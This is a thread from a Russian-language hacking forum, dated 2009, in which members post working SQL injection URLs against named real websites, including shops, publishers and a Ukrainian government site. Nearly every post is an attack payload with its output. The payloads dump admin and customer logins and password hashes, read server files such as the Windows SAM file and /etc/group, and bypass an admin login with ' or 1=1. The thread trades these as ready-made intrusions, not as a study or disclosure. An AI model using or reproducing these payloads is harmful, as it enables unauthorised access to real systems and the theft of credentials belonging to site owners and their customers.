HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 13.11.2009, 14:21
Gaus
Участник форума
Регистрация: 08.02.2009
Сообщений: 196
Провел на форуме:
1420275

Репутация: 127
По умолчанию

PR5
Код:
http://www.horwoodpublishing.net/order.php?id=-140+union+select+1,concat_ws(0x3a,username,pwd),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+tbl_users--
version: 4.1.15-standard-log
database: horwoodpub
-----------------------------------------
PR5
Код:
http://www.iams.co.uk/cat/where-to-buy.php?id=-46+union+select+1,concat_ws(0x3a,version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--
version: 5.0.37-community-log
database: iamsfr
-----------------------------------------
PR5
Код:
http://www.rtos.com/page/product.php?id=-2+union+select+1,2,version(),4--
version: 4.1.20-log
database: expresslogic

Последний раз редактировалось Gaus; 13.11.2009 в 19:14..
 
Ответить с цитированием

  #2  
Старый 11.11.2009, 20:59
Xcontrol212
Постоянный
Регистрация: 13.02.2008
Сообщений: 505
Провел на форуме:
2916750

Репутация: 277


По умолчанию

Код:
http://www.cyclosprint.eu/shop.php?cid=93&hmID=-1+union+select+1,concat_ws(%27;%27,login,password),3,4,5,6,7,8,9+from+users_admin+limit+1,1/*
Код:
http://www.cap-press.com/cart.php?add=-1+union+select+1,version()--
5.0.67-log
5 версия
capsci_r@209.68.2.28
capsci_bookdb

Таблицы:
Код:
auth_scr
auth_scr_reply
authbook
authors
book_links
books
books_forwarding
books_link
books_tmp
booksubj
contacts
discounts
frontpage
minosubjects
misc
orders
page_contents
series
series_book
subjects
supps
tms
tracklog
Код:
http://www.euroinf.it/shop/shop.php?id=-1 union select 1,2,3,Column_Name,5,6,7,8 from INFORMATION_SCHEMA.Columns where Table_Name=0x636c69656e746932/*
Тут видны все таблы:
Код:
http://www.euroinf.it/shop/shop.php?id=-1+union+select+1,2,3,table_name,5,6,7,8+from+INFORMATION_SCHEMA.TABLES/*

Последний раз редактировалось jokester; 11.11.2009 в 21:02.. Причина: хеш админка
 
Ответить с цитированием

  #3  
Старый 11.11.2009, 21:55
Bb0y
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
Провел на форуме:
736224

Репутация: 388
По умолчанию

Говермент)

MySQL 5.0.45-community-nt
сервер на винде
http://odpa14.gov.ua/?_npp=-3746+union+select+1,concat_ws(0x3a,user,0x3a,passw ord,0x3a,file_priv)+from+mysql.user

http://odpa14.gov.ua/?_npp=-3746+union+select+1,hex(load_file(0x633a2f77696e64 6f77732f7265706169722f73616d)) - чтение файлов на сервере. файл sam
 
Ответить с цитированием

  #4  
Старый 11.11.2009, 23:36
onbka
Новичок
Регистрация: 29.10.2009
Сообщений: 15
Провел на форуме:
109810

Репутация: 17
По умолчанию

Цитата:
http://housewives.org.ua/text.php?id=-689 union select 1,2,3,4,concat_ws(0x3a,version(),user(),databa se()) --
4.1.25-log:freemp3_slovo@193.200.173.5:freemp3_slovo
 
Ответить с цитированием

  #5  
Старый 12.11.2009, 00:45
[aywo]
Познающий
Регистрация: 01.02.2007
Сообщений: 89
Провел на форуме:
1668307

Репутация: 114
По умолчанию

PR4
Код:
http://www.proconsim.ru/cat.php?m=-1+union+select+1,2,3,concat_ws(0x3a,user(),%20version(),%20database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41/*
PR1
Код:
http://www.czech-tech.ru/index.php?dword=catalog&id=10+union+select+1,2,3,table_name+from+INFORMATION_SCHEMA.TABLES+LIMIT+1,1 --
PR3
Код:
http://www.baurum.ru/_library/?cat=pipes-plastic&id=-9999+union+select+1,2,concat_ws(0x3a,%20version(),%20user(),%20database()),4,5,6,7,8,9,10,11,12/*

Последний раз редактировалось [aywo]; 12.11.2009 в 02:14..
 
Ответить с цитированием

  #6  
Старый 12.11.2009, 01:49
Mr.Br0wn
Новичок
Регистрация: 26.10.2009
Сообщений: 17
Провел на форуме:
124258

Репутация: 27
По умолчанию

Код:
http://www.slavgorod.ru/admin/editnews.php?id=3775{SQL}
login: ' or 1=1/*
password: ' or 1=1/*

Код:
http://www.slavgorod.ru/admin/
ТИЦ: 230
PR: 3
 
Ответить с цитированием

  #7  
Старый 12.11.2009, 02:44
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

Секас-шоп, закупаемся ^^

http://www.extremerestraints.com/tell_a_friend.php?products_id=1248+union+select+*+ from+(select+*+from+(select+name_const((select+con cat_ws(0x2F,customers_email_address,customers_pass word)+from+customers+limit+0,1),14)d)+as+t+join+(s elect+name_const((select+concat_ws(0x2F,customers_ email_address,customers_password)+from+customers+l imit+0,1),14)e)b)a--+
 
Ответить с цитированием

  #8  
Старый 12.11.2009, 21:15
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию

вывод в ошибке
Цитата:
http://survey.tpg.nl/php/main.phtml?c-Object=surv&c-Action=showform&c-Mode=test&ID=334+union+select+1,2,3,4,5,6,7,8,9,10 ,user(),12,13,14,15,16,17+limit+1,1/*
version()=4.0.21
user()=tpgsurveyuser3@localhost
 
Ответить с цитированием

  #9  
Старый 12.11.2009, 22:02
KNR
Новичок
Регистрация: 30.10.2009
Сообщений: 21
Провел на форуме:
182669

Репутация: 24
По умолчанию

Код:
http://ezonet.ru/teldir.php?catID=-36+union+select+concat_ws(0x3a,version(),database(),user(),@@version_compile_os)
4.0.27-max-log:ezonet77:ezonet77@v50.valuehost.ru:unknown-freebsd4.7
 
Ответить с цитированием

  #10  
Старый 12.11.2009, 22:46
547
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147

Репутация: 211
По умолчанию

Код:
http://www.motorama.be/show.php?id=-117+union+select+1,2,concat_ws(database(),user(),version(),@@version_compile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17--
root@localhostmotorama4.1.20-logmotoramaredhat-linux-gnu

Код:
http://www.motorama.be/show.php?id=-117+union+select+1,2,concat_ws(0x3a,user,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+mysql.user--
LFI:
Код:
http://www.motorama.be/show.php?id=-117+union+select+1,2,load_file('/etc/group'),4,5,6,7,8,9,10,11,12,13,14,15,16,17--
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.